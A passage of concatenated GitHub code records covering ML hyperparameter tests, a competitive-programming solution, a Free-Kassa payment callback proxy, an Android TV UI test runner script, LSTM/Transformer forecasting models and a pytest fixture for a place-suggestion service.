cf_opt = dict( # optimization method\n call = 'SGD',\n lr = 0.5, # Note this is from Paper 9 (Paper 10 used 0.1)\n momentum = 0.9,\n weight_decay = 1e-4,\n nesterov = True,\n )\n cf_scheduler = dict( # learning rate schedule\n call = 'MultiStepLR',\n milestones = [150, 225],\n gamma = 0.1\n )\n return cf_opt, cf_scheduler\n\ndef get_loader_hyperparameters():\n hyperparameters = dict(dataset_name = \"cifar100\",\n batch_size = (1,1,250), #(train, val, test)\n augment = True,\n val_split = 0.1,\n )\n return hyperparameters\n\n\ndef get_test_hyperparameters(n_exits, model_type):\n if model_type == \"msdnet\":\n cf_loss = dict( # evaluation metric\n call = 'MultiExitAccuracy',\n n_exits = n_exits,\n acc_tops = (1,5),\n )\n return cf_loss\n","repo_name":"mailingliam02/MultiExit_BNNs","sub_path":"tests/test_hyperparameters.py","file_name":"test_hyperparameters.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5390150982","text":"n = int(input())\ndata = []\nscore = [1]*n #덩치등수 기록\nfor _ in range(n):\n x,y = map(int,input().split())\n data.append((x,y))\n\nfor i in range(0,n-1):\n for j in range(i+1,n):\n if data[i][0] > data[j][0] and data[i][1] > data[j][1]:\n score[j]+=1\n elif data[i][0] < data[j][0] and data[i][1] < data[j][1]:\n score[i]+=1\n else: continue\n\nfor i in score:\n print(i, end=\" \")","repo_name":"easyDong19/PS_inARMY","sub_path":"baekjoon/past/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42160460525","text":"from aiohttp import web\n\nimport utils\nfrom configreader import Config\n\n\nasync def free_kassa_notification(request: web.Request):\n config: Config = request.app[\"config\"]\n\n # Список ip free-kassы на этой странице https://docs.freekassa.ru/#section/1.-Vvedenie/1.4.-Opoveshenie-o-platezhe\n allowed_ips = [\"168.119.157.136\", \"168.119.60.227\", \"138.201.88.124\", \"178.154.197.79\"]\n if request.client.host not in allowed_ips:\n raise web.HTTPUnauthorized\n\n kwargs = {\n \"params\": request.query,\n \"data\": await request.post(),\n }\n response = await utils.request(\n request.method, config.success_url, **{key: value for key, value in kwargs.items() if value is not None}\n )\n return web.Response(body=await response.text(), headers=response.headers, status=response.status)\n\n\n# Сюда редиректит пользователя при удачной оплате\nasync def free_kassa_success(request: web.Request):\n config: Config = request.app[\"config\"]\n\n response = await utils.request(request.method, config.success_url)\n return web.Response(body=await response.text(), headers=response.headers, status=response.status)\n\n\n# Сюда редиректит пользователя при неудачной оплате\nasync def free_kassa_failure(request: web.Request):\n config: Config = request.app[\"config\"]\n\n response = await utils.request(request.method, config.failure_url)\n return web.Response(body=await response.text(), headers=response.headers, status=response.status)\n\n\nroutes = [\n web.route(\"*\", \"/free-kassa/notification\", free_kassa_notification),\n web.get(\"/free-kassa/success\", free_kassa_success),\n web.get(\"/free-kassa/failure\", free_kassa_failure),\n]\n\n\napp = web.Application()\napp[\"config\"] = Config()\napp.add_routes(routes)\n\nweb.run_app(app, host=\"127.0.0.1\", port=8001)\n","repo_name":"alteralt/free-kassa-proxy","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33711046712","text":"import argparse\nimport subprocess\n\nimport sys\n\nimport app_tool\nimport device\nimport emulator\nimport logs_tool as logs\nimport utils\n\nparser = argparse.ArgumentParser()\n# env:\nparser.add_argument('--branch', metavar='Var', type=str, default='trunk',\n help='Branch for build apps')\nparser.add_argument('--signer_token', metavar='Var', type=str, default='NONE', help='Signer token')\nparser.add_argument('--tus_token', metavar='Var', type=str, default='NONE', help='TUS token')\nparser.add_argument('--testpalm_token', metavar='Var', type=str, default='NONE',\n help='Testpalm token')\n\n# options for tests:\nparser.add_argument('--droideka_url', metavar='Var', type=str,\n default='https://droideka.smarttv.yandex.net',\n help='API url: prod, prestable, testing')\nparser.add_argument('--ya_login', metavar='Var', type=str, default='NONE',\n help='Login for yandex account in tests')\nparser.add_argument('--ya_pass', metavar='Var', type=str, default='NONE',\n help='Password for yandex account in tests')\nparser.add_argument('--test_suite', metavar='Var', type=str, default='Acceptance',\n help='Acceptance, Regression, DroidekaRegression, '\n 'ModuleRegression, UpdaterAcceptance, ServicesSdkTests')\nparser.add_argument('--test_class', metavar='Var', type=str, default='NONE',\n help='For run all tests in class > provide class name. '\n 'Example: SearchScreen. '\n 'For run only one test > provide test name. '\n 'Example: SearchScreen#checkAllElements')\nparser.add_argument('--testpalm_report', metavar='Var', type=str, default='false',\n help='Send report to testpalm')\nparser.add_argument('--centaur_device_id', metavar='Var', type=str,\n default='NONE',\n help='Centaur device id')\nparser.add_argument('--product', metavar='Var', type=str, default='tv',\n help='tv, station, centaur, tv-updater, tv-services')\n\n# emulator:\nparser.add_argument('--emulator_api', metavar='Var', type=str, default='25',\n help='Android API for start emulator')\nparser.add_argument('--emulator_resolution', metavar='Var', type=str, default='1080',\n help='Emulator resolution. 1080 for use 1920x1080 and 720 for use 1280x720')\n\n# kolhoz:\nparser.add_argument('--kolhoz_token', metavar='Var', type=str, default='NONE', help='Kolhoz token')\nparser.add_argument('--kolhoz_device_id', metavar='Var', type=str, default='NONE',\n help='Kolhoz device id')\n\n# real device\nparser.add_argument('--serial_number', metavar='Var', type=str, default='NONE',\n help='Device IP or ID of module')\n\n# for debugging\nparser.add_argument('--emulator_only', metavar='Var', type=str, default='false',\n help='Run emulator with yandex apps')\nparser.add_argument('--delete_emulator', metavar='Var', type=str, default='true',\n help='Stop and delete emulator after tests')\nparser.add_argument('--skip_build_services', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--skip_build_updater', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--skip_build_video_player', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--skip_download_apps', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--is_sign_apps', metavar='Var', type=str, default='true',\n help=f'''Attention! Yandex passport will not work without sign apps.\n And iosdk don't get the config from quasmodrom.''')\nparser.add_argument('--quasar_id', metavar='Var', type=str,\n default='NONE',\n help='''You can set your own quasar ID.\n You need to create a config here:\n https://quasmodrom-test.quasar-int.yandex-team.ru/admin/development/device/\n ''')\n\ninput_args = parser.parse_args()\n\n\ndef run_sdk_tests_in_services():\n # build test_app\n app_tool.build_services_test_app()\n # build test_app_client\n app_tool.build_services_test_app_client('assembleDebug')\n # build test_app_client with android tests\n app_tool.build_services_test_app_client('assembleDebugAndroidTest')\n\n # start and prepare emulator\n app_tool.download_apps_for_regression(BUILD_CONFIG)\n serial_number = emulator.run_tv_emulator(BUILD_CONFIG)\n app_tool.push_all_apps_for_regression(serial_number, BUILD_CONFIG)\n app_tool.prepare_and_push_permission_for_enable_brick_mode(serial_number)\n device.reboot(serial_number, None)\n device.root_remount(serial_number)\n app_tool.prepare_and_push_device_owner_for_enable_brick_mode(serial_number)\n device.reboot(serial_number, None)\n device.root_remount(serial_number)\n device.disable_suw(serial_number, 'true')\n device.root_remount(serial_number)\n app_tool.print_installed_apps(serial_number)\n\n # install test_app\n app_tool.install_services_test_app(serial_number)\n\n # run tests\n return run_marathon_tests(BUILD_CONFIG)\n\n\ndef run_tests_on_centaur_emulator():\n # build apps\n app_tool.build_centaur_app(\"assembleDemoX86Debug\", BUILD_CONFIG)\n app_tool.build_centaur_app(\"assembleDemoX86DebugAndroidTest\", BUILD_CONFIG)\n\n # start and prepare emulator\n serial_number = emulator.run_centaur_emulator(BUILD_CONFIG)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n return status.returncode\n\n\ndef run_tests_on_station(serial_number):\n # build apps\n app_tool.build_quasar_app(\"assembleProdV7Debug\", BUILD_CONFIG)\n app_tool.build_quasar_app(\"assembleProdV7DebugAndroidTest\", BUILD_CONFIG)\n\n # prepare device\n device.connect_to_device_if_needed(serial_number, True)\n station_version = device.get_station_version(serial_number, BUILD_CONFIG)\n device.change_logs_buffer(serial_number)\n if station_version == '1':\n device.backup_system_quasar_app_on_station(serial_number, BUILD_CONFIG)\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n if station_version == '1':\n device.restore_system_quasar_app_on_station(serial_number, BUILD_CONFIG)\n\n # get logs\n logs.echo_title('Remove test apps')\n app_tool.uninstall_app(serial_number, 'ru.yandex.quasar.app')\n app_tool.uninstall_app(serial_number, 'ru.yandex.quasar.app.test')\n return status.returncode\n\n\ndef run_tests_on_station_emulator():\n # build apps\n app_tool.build_quasar_app(\"assembleProdX86Debug\", BUILD_CONFIG)\n app_tool.build_quasar_app(\"assembleProdX86DebugAndroidTest\", BUILD_CONFIG)\n app_tool.build_quasar_daemons()\n\n # sign apps\n app_paths = app_tool.get_app_paths()\n app_tool.sign_app_via_aosp_platform_key(app_paths[\"QuasarApp\"][\"main_app_path_x86\"])\n app_tool.sign_app_via_aosp_platform_key(app_paths[\"QuasarApp\"][\"test_app_path_x86\"])\n\n # run emulator\n serial_number = emulator.run_station_emulator(BUILD_CONFIG)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.get_quasar_daemons_logs(serial_number)\n device.take_screenshot(serial_number, 'screen_after_tests')\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n return status.returncode\n\n\ndef run_updater_isolated_tests_on_emulator():\n # build apps\n app_tool.build_updater_tests_app(\"assembleLocalTvTestUiLoggedDebug\", BUILD_CONFIG)\n app_tool.build_updater_tests_app(\"assembleLocalTvTestUiLoggedDebugAndroidTest\", BUILD_CONFIG)\n\n # start and prepare emulator\n serial_number = emulator.run_tv_emulator(BUILD_CONFIG)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n app_tool.build_and_push_services(serial_number, BUILD_CONFIG)\n device.reboot(serial_number, None)\n device.wait_wifi_connection_on_emulator(serial_number, BUILD_CONFIG[\"emulator_api\"])\n app_tool.print_installed_apps(serial_number)\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n return status.returncode\n\n\ndef run_tests_on_tv_emulator():\n\n BUILD_CONFIG['gradle_property_for_emulator'] = '-PisTestOnEmulator=true'\n app_tool.build_home_app(\"assembleDebug\", BUILD_CONFIG)\n app_tool.build_home_app(\"assembleDebugAndroidTest\", BUILD_CONFIG)\n\n serial_number = emulator.run_tv_emulator(BUILD_CONFIG)\n device.change_logs_buffer(serial_number)\n\n # Build abd push servicesIosdk, tvServices and tvPlatformServices\n if BUILD_CONFIG[\"test_suite\"] == 'Acceptance' or 'ChildMode' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_services(serial_number, BUILD_CONFIG)\n\n # Build abd push yandex updater\n if BUILD_CONFIG[\"test_suite\"] != 'Acceptance' or (\n BUILD_CONFIG[\"test_suite\"] != 'Acceptance' and BUILD_CONFIG[\"emulator_only\"] != 'true'):\n updater_apk_path = app_tool.build_updater(BUILD_CONFIG)\n app_tool.push_to_device(serial_number, updater_apk_path,\n app_tool.get_app_paths()[\"Updater\"][\"device_path\"])\n\n # Build abd push yandex bugReportSender\n if 'Bugreport' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_bugreportsender(serial_number, BUILD_CONFIG)\n\n # Build abd push yandex SetupWizard\n if 'SetupWizard' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_setup_wizard(serial_number, BUILD_CONFIG)\n\n # Build abd push YandexVideoPlayer, YandexTvInputService, YandexWebPlayer and YandexLiveTv\n if 'Player' in BUILD_CONFIG[\"test_class\"] or 'Tv' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_video_player_apps(serial_number, BUILD_CONFIG)\n\n # Build abd push other yandex apps\n if BUILD_CONFIG[\"test_suite\"] != 'Acceptance':\n app_tool.download_apps_for_regression(BUILD_CONFIG)\n app_tool.push_all_apps_for_regression(serial_number, BUILD_CONFIG)\n\n device.reboot(serial_number, None)\n device.wait_wifi_connection_on_emulator(serial_number, BUILD_CONFIG[\"emulator_api\"])\n\n if BUILD_CONFIG[\"test_suite\"] != 'Acceptance':\n device.root_remount(serial_number)\n device.disable_suw(serial_number, 'true')\n\n device.stop_and_clear_home_app(serial_number)\n app_tool.print_installed_apps(serial_number)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n BUILD_CONFIG['annotation_for_block_tests_1'] = 'androidx.test.filters.RequiresDevice'\n BUILD_CONFIG['annotation_for_block_tests_2'] = 'androidx.test.filters.SdkSuppress'\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.rename_reports(serial_number, BUILD_CONFIG)\n\n if BUILD_CONFIG[\"delete_emulator\"] == 'true':\n emulator.stop_emulator(serial_number)\n emulator.delete_emulator(BUILD_CONFIG[\"emulator_name\"])\n return status\n\n\ndef run_tests_on_tv(serial_number):\n # build apps\n BUILD_CONFIG['gradle_property_for_emulator'] = '-PisTestOnEmulator=false'\n app_tool.build_home_app(\"assembleDebug\", BUILD_CONFIG)\n app_tool.build_home_app(\"assembleDebugAndroidTest\", BUILD_CONFIG)\n\n # prepare device\n device.connect_to_device_if_needed(serial_number, True)\n device.change_settings_on_device(serial_number)\n device.update_time_on_device(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n device.disable_suw(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n device.delete_apps_and_old_screenshots(serial_number)\n device.clear_data_in_apps(serial_number, BUILD_CONFIG[\"test_class\"])\n device.change_logs_buffer(serial_number)\n if BUILD_CONFIG[\"test_suite\"] == 'UpdaterAcceptance' or BUILD_CONFIG[\"test_class\"] == 'NONE' \\\n or 'Updater' in BUILD_CONFIG[\"test_class\"]:\n updater_apk_path = app_tool.build_updater(BUILD_CONFIG)\n app_tool.install_app(serial_number, updater_apk_path)\n device.stop_and_clear_home_app(serial_number)\n device.clear_logs_and_delete_bugreports(serial_number)\n app_tool.print_installed_apps(serial_number)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n device.delete_app('com.yandex.launcher.updaterapp', serial_number)\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.rename_reports(serial_number, BUILD_CONFIG)\n return status\n\n\ndef run_tests(serial_number, is_on_emulator):\n if serial_number is None:\n serial_number = BUILD_CONFIG[\"serial_number\"]\n else:\n serial_number = serial_number\n\n if BUILD_CONFIG[\"product\"] == 'station':\n if is_on_emulator is True:\n return run_tests_on_station_emulator()\n else:\n return run_tests_on_station(serial_number)\n else:\n if is_on_emulator is True:\n return run_tests_on_tv_emulator()\n else:\n return run_tests_on_tv(serial_number)\n\n\ndef run_marathon_tests(environment):\n logs.echo_title('Run tests')\n return subprocess.run(f'''marathon \\\n --analyticsTracking=false \\\n --bugsnag=false \\\n --marathonfile=\"tv/ci/ui-tests/Marathonfile\"''', env=environment, shell=True)\n\n\nif __name__ == '__main__':\n device.install_python_requirements('requests', '2.27.1')\n device.install_python_requirements('retrying', '1.3.3')\n BUILD_CONFIG = utils.init_build_config(input_args)\n utils.print_env(BUILD_CONFIG)\n utils.check_apksigner()\n utils.check_avd_manager()\n\n if BUILD_CONFIG[\"emulator_only\"] == 'true':\n build_status = emulator.run_emulator_only(BUILD_CONFIG)\n elif BUILD_CONFIG[\"product\"] == 'centaur':\n build_status = run_tests_on_centaur_emulator()\n elif BUILD_CONFIG[\"kolhoz_device_id\"] != 'NONE':\n serial = device.connect_to_device_in_kolhoz(BUILD_CONFIG)\n build_status = run_tests(serial_number=serial, is_on_emulator=False)\n device.disconnect_from_device_in_kolhoz(BUILD_CONFIG)\n elif BUILD_CONFIG[\"serial_number\"] != 'NONE':\n build_status = run_tests(serial_number=None, is_on_emulator=False)\n elif BUILD_CONFIG[\"product\"] == 'tv-services':\n build_status = run_sdk_tests_in_services()\n elif BUILD_CONFIG[\"product\"] == 'tv-updater':\n build_status = run_updater_isolated_tests_on_emulator()\n else:\n build_status = run_tests(serial_number=None, is_on_emulator=True)\n\n utils.generate_allure_report(BUILD_CONFIG[\"is_teamcity\"])\n logs.send_report_to_testpalm(BUILD_CONFIG)\n logs.echo_title('Build finished')\n if build_status == 1:\n sys.exit(1)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"smart devices/ui-tests/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":16081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18250589132","text":"import logging\n\n# https://docs.python.org/3/library/logging.html\nlogging.basicConfig(level = logging.INFO,format = '%(asctime)s %(name)s %(levelname)s %(filename)s:%(lineno)d %(message)s')\nlogger = logging.getLogger(__name__)\n\nlogger.info(\"Start print log\")\nlogger.debug(\"Do something\")\nlogger.warning(\"Something maybe fail.\")\nlogger.info(\"Finish\")\n","repo_name":"zhangxiaohei/python_tool","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70226241810","text":"from keras.models import Model\nfrom keras.layers import Input, Dense, Dropout, LayerNormalization\nfrom keras.layers import MultiHeadAttention, Flatten\nfrom keras.optimizers import Adam\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, Dense, Dropout\nfrom keras.callbacks import EarlyStopping\nfrom keras.regularizers import l2\nfrom keras.callbacks import ModelCheckpoint\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n\n######## DATA PREPARATION ########\n\ndef create_train_test_data(journey_train_scaled, journey_test_scaled, lookback, boroughs):\n \"\"\"\n This function creates the input and output data for a DL model, that is designed to forecast bike sharing demand for each borough in London separately.\n It uses the concept of 'lookback', which is the number of past observations that the model uses to forecast the next one.\n \n Args:\n journey_train_scaled : DataFrame containing the scaled training data.\n journey_test_scaled : DataFrame containing the scaled testing data.\n lookback : int, Number of past observations to use for forecasting the next one.\n\n Returns:\n X_train : Array containing the input sequences for the training data.\n Y_train : Array containing the output sequences for the training data.\n X_test : Array containing the input sequences for the testing data.\n Y_test : Array containing the output sequences for the testing data.\n \"\"\"\n\n # identify indices of boroughs and demand in the dataframe\n borough_indices = [journey_train_scaled.columns.get_loc('start_borough_' + borough) for borough in boroughs]\n demand_index = journey_train_scaled.columns.get_loc('demand')\n\n # convert dataframes to numpy arrays\n journey_train_scaled = journey_train_scaled.values\n journey_test_scaled = journey_test_scaled.values\n\n # initialize lists to store input sequences and corresponding outputs\n X_train, Y_train = [], []\n X_test, Y_test = [], []\n\n # create training and testing sequences and corresponding outputs\n X_train, Y_train = _create_sequences(journey_train_scaled, borough_indices, demand_index, lookback, X_train, Y_train)\n X_test, Y_test = _create_sequences(journey_test_scaled, borough_indices, demand_index, lookback, X_test, Y_test)\n\n\n # convert lists to numpy arrays and return\n return np.array(X_train), np.array(Y_train), np.array(X_test), np.array(Y_test)\n\n\ndef _create_sequences(journey_scaled, borough_indices, demand_index, lookback, X, Y):\n \"\"\"\n Helper function to create sequences and corresponding outputs.\n \"\"\"\n for i in range(len(journey_scaled)):\n X_temp = [] # create a temporary list to store the current sequence\n current_borough = np.argmax(journey_scaled[i, borough_indices]) # identify the borough of the current data point\n X_temp.append(journey_scaled[i]) # add the current data point to the sequence\n\n for j in range(i+1, len(journey_scaled)): # iterate over the rest of the data points starting from the next data point\n if np.argmax(journey_scaled[j, borough_indices]) == current_borough: # if the borough of the current data point (j) is the same as the borough of the initial data point (i)\n X_temp.append(journey_scaled[j]) # add the current data point (j) to the sequence\n if len(X_temp) == lookback + 1: # if the sequence has reached the desired length (lookback + 1)\n X.append(np.array(X_temp[:-1])) # add the sequence (excluding the last data point) to the training input data\n Y.append(journey_scaled[i+lookback, demand_index]) # ddd the demand of the last data point in the sequence to the training output data\n break # break the inner loop as we have collected a complete sequence for training\n return X, Y\n\n\ndef min_max_scaling(journey_train, journey_test, journey_train_orig, journey_test_orig):\n \"\"\"\n This function scales the features in the journey data to a specified range (0 to 1) using Min-Max scaling.\n The scaler is fit on the training data and then used to transform both the training and test data. The 'demand' feature is then added back to the scaled data.\n\n Args:\n journey_train : DataFrame containing the journey training data.\n journey_test : DataFrame containing the journey testing data.\n journey_train_orig : Original (unscaled) DataFrame containing the journey training data.\n journey_test_orig : Original (unscaled) DataFrame containing the journey testing data.\n\n Returns:\n journey_train_scaled : DataFrame containing the scaled journey training data with 'demand' added back.\n journey_test_scaled : DataFrame containing the scaled journey testing data with 'demand' added back.\n \"\"\"\n\n # initialize the Min-Max scaler\n scaler = MinMaxScaler(feature_range=(0, 1))\n\n # fit the scaler using the training data and transform the training data\n journey_train_scaled = scaler.fit_transform(journey_train)\n\n # use the fitted scaler to transform the test data\n journey_test_scaled = scaler.transform(journey_test)\n\n # convert the scaled arrays back to DataFrames\n journey_train_scaled = pd.DataFrame(journey_train_scaled, columns=journey_train.columns)\n journey_test_scaled = pd.DataFrame(journey_test_scaled, columns=journey_test.columns)\n\n # add the 'demand' feature back to the scaled data\n journey_train_scaled['demand'] = journey_train_orig['demand'].values\n journey_test_scaled['demand'] = journey_test_orig['demand'].values\n\n return journey_train_scaled, journey_test_scaled\n\n\n\ndef positional_encoding(length, d_model):\n \"\"\"\n Compute positional encoding for a given sequence length and model dimension.\n \n Args:\n length (int): Length of the sequence.\n d_model (int): Dimension of the model.\n\n Returns:\n numpy.ndarray: Positional encoding matrix.\n \"\"\"\n pos_enc = np.zeros((length, d_model))\n for pos in range(length):\n for i in range(0, d_model, 2):\n pos_enc[pos, i] = np.sin(pos / (10000 ** ((2 * i) / d_model)))\n if i + 1 < d_model:\n pos_enc[pos, i + 1] = np.cos(pos / (10000 ** ((2 * i) / d_model)))\n\n return pos_enc\n\n\ndef add_positional_encoding(data):\n \"\"\"\n Add positional encoding to the input data.\n\n Args:\n data (numpy.ndarray): The input data with 3D tensor shape (num_samples, sequence_length, num_features).\n\n Returns:\n numpy.ndarray: The input data with added positional encoding.\n \"\"\"\n num_samples, sequence_length, num_features = data.shape\n pos_enc = positional_encoding(sequence_length, num_features)\n\n # expand dims to match shape of data\n pos_enc = np.expand_dims(pos_enc, axis=0)\n\n # repeat positional encoding for each sample\n pos_enc = np.repeat(pos_enc, num_samples, axis=0)\n\n return data + pos_enc\n\n\n\n\n######## LSTM MODEL ########\n\ndef create_lstm(X_train, units, dropout, reg):\n \"\"\"\n Create LSTM model with four LSTM layers and a dense output layer.\n \n Args:\n X_train (numpy.ndarray): The training data with shape (num_samples, sequence_length, num_features).\n units (int): The number of LSTM units for each layer.\n dropout (float): The dropout rate for the dropout layer after each LSTM layer.\n reg (float): The regularization factor. (Not used in this function, but can be used to add regularization to the LSTM layers)\n\n Returns:\n keras.models.Sequential: The constructed LSTM model.\n \"\"\"\n\n lstm_model = Sequential()\n # first lstm layer\n lstm_model.add(LSTM(units=units, return_sequences=True, input_shape=(X_train.shape[1], X_train.shape[2])))\n lstm_model.add(Dropout(dropout))\n # second lstm layer\n lstm_model.add(LSTM(units=units, return_sequences=True))\n lstm_model.add(Dropout(dropout))\n # third lstm layer\n lstm_model.add(LSTM(units=units, return_sequences=True))\n lstm_model.add(Dropout(dropout))\n # forth lstm layer\n lstm_model.add(LSTM(units=units))\n lstm_model.add(Dropout(dropout))\n # output layer\n lstm_model.add(Dense(units=1))\n return lstm_model\n\n\n\n\n######## TRANSFORMER MODEL ########\n\nclass Transformer:\n def __init__(self, num_heads=8, dropout_rate=0.1, num_layers=2):\n \"\"\"\n Initialize Transformer model with given parameters.\n\n Args:\n num_heads (int): The number of attention heads. Default is 8.\n dropout_rate (float): The dropout rate for Dropout layers. Default is 0.1.\n num_layers (int): The number of Transformer layers. Default is 2.\n \"\"\"\n self.num_heads = num_heads\n self.dropout_rate = dropout_rate\n self.num_layers = num_layers\n\n def create_transformer(self, input_shape):\n \"\"\"\n Create a Transformer model with the previously specified parameters.\n\n Args:\n input_shape (tuple): The shape of the input data.\n\n Returns:\n tensorflow.python.keras.engine.training.Model: The constructed Transformer model.\n \"\"\"\n inputs = Input(shape=input_shape)\n x = inputs\n for _ in range(self.num_layers):\n # Self-attention and normalization\n attn_output = MultiHeadAttention(num_heads=self.num_heads, key_dim=input_shape[-1])(x, x)\n attn_output = Dropout(self.dropout_rate)(attn_output)\n out1 = LayerNormalization(epsilon=1e-6)(x + attn_output)\n\n # Feed-forward and normalization\n ffn_output = Dense(input_shape[-1], activation='relu')(out1)\n ffn_output = Dense(input_shape[-1])(ffn_output)\n ffn_output = Dropout(self.dropout_rate)(ffn_output)\n out2 = LayerNormalization(epsilon=1e-6)(out1 + ffn_output)\n\n x = out2\n\n x = Flatten()(x)\n outputs = Dense(1)(x) \n\n return Model(inputs=inputs, outputs=outputs)\n\n def train(self, x_train, y_train, batch_size=32, epochs=10, validation_split=0.1):\n \"\"\"\n Train the Transformer model on the given training data.\n\n Args:\n x_train (numpy.ndarray): The training input data.\n y_train (numpy.ndarray): The training output data.\n batch_size (int): The batch size for training. Default is 32.\n epochs (int): The number of epochs to train for. Default is 10.\n validation_split (float): The fraction of the training data to be used as validation data. Default is 0.1.\n\n Returns:\n tensorflow.python.keras.callbacks.History: The history object that contains all information collected during training.\n \"\"\"\n\n # create transfomer\n model = self.create_transformer(x_train.shape[1:])\n\n # add adam optimizer\n model.compile(optimizer=Adam(), loss='mae') \n\n # add early stopping\n early_stopping = EarlyStopping(\n monitor='val_loss', \n patience=10,\n restore_best_weights=True\n )\n\n # create a model checkpoint \n checkpoint = ModelCheckpoint(\n \"./transformer_model_epoch_{epoch}.h5\", \n monitor=\"val_loss\", \n verbose=1, \n save_best_only=False, \n mode=\"auto\", \n save_freq=\"epoch\",\n )\n\n # fit model\n history = model.fit(\n x_train, \n y_train, \n batch_size=batch_size, \n epochs=epochs, \n validation_split=validation_split, \n callbacks=[early_stopping, checkpoint]\n )\n\n self.model = model\n return history\n\n def predict(self, x):\n \"\"\"\n Use the trained Transformer model to make predictions on the given data.\n\n Args:\n x (numpy.ndarray): The input data to make predictions on.\n\n Returns:\n numpy.ndarray: The predictions made by the model.\n \"\"\"\n return self.model.predict(x)\n","repo_name":"tabeaeggler/UrbanMobility","sub_path":"src/models_ml_dl/deep_learning_model.py","file_name":"deep_learning_model.py","file_ext":"py","file_size_in_byte":11828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33638787932","text":"import pytest\n\nUSER_ID = '12345678901234567890123456789012'\nDEFAULT_PHONE_ID = '02aaaaaaaaaaaaaaaaaaaa01'\nDEFAULT_UID = '400000000'\n\nYAMAPS_ADDRESS = {\n 'geocoder': {\n 'address': {\n 'formatted_address': 'Russia, Moscow, Petrovskiy alley, 21',\n 'country': 'Russia',\n 'locality': 'Moscow',\n },\n 'id': '1',\n },\n 'uri': 'ymapsbm1://URI_1_1',\n 'name': 'Petrovskiy alley, 21',\n 'description': 'Russia, Moscow',\n 'geometry': [37.586634, 55.736716],\n}\n\nPLACE = [\n {\n 'info': {\n 'timeinfo': {\n 'full_text': 'Вы были здесь уже 3 раз',\n 'short_text': '3 раз за 2 недели',\n },\n 'available_types': ['home', 'other'],\n },\n 'point': {\n 'coordinates': [37.586634, 55.736716],\n 'subtitle': 'Petrovskiy alley, 21',\n 'title': 'Russia, Moscow, Petrovskiy alley, 21',\n 'uri': 'ymapsbm1://URI_1_1',\n },\n },\n]\n\nSUGGEST_PARAMS = {\n 'match': {'predicate': {'type': 'true'}, 'enabled': True},\n 'name': 'userplaces_suggest_params',\n 'consumers': ['userplaces/userplaces'],\n 'clauses': [],\n 'is_config': True,\n}\n\n\n@pytest.mark.translations(\n client_messages={\n 'userplaces.suggest.short_text_rides_count': {\n 'ru': '%(rides_count)s раз',\n },\n 'userplaces.suggest.short_text_weeks_count': {\n 'ru': ' за %(weeks_count)s недели',\n },\n 'userplaces.suggest.full_text': {\n 'ru': 'Вы были здесь уже %(rides_count)s раз',\n },\n },\n)\n@pytest.mark.parametrize(\n 'status_code,max_results,response_place',\n [\n 